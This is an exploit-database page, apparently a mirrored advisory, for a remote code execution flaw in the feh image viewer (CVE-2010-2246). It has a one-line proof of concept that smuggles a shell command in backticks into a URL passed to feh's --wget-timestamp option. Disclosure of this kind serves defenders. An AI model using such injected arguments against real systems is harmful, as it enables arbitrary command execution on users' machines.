[] NeoSense
E X P L O I T S
title author type platform port cve id

feh 1.7 - '--wget-Timestamp' Remote Code Execution

Author: anonymous
type: remote
platform: linux
port: 
date_added: 2010-06-25 
date_updated: 2014-07-29 
verified: 1 
codes: CVE-2010-2246;OSVDB-66063 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/41161/info

feh is prone to a remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer.

feh --wget-timestamp 'http://www.example.com/stuff/bar`touch lol_hax`.jpg'
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.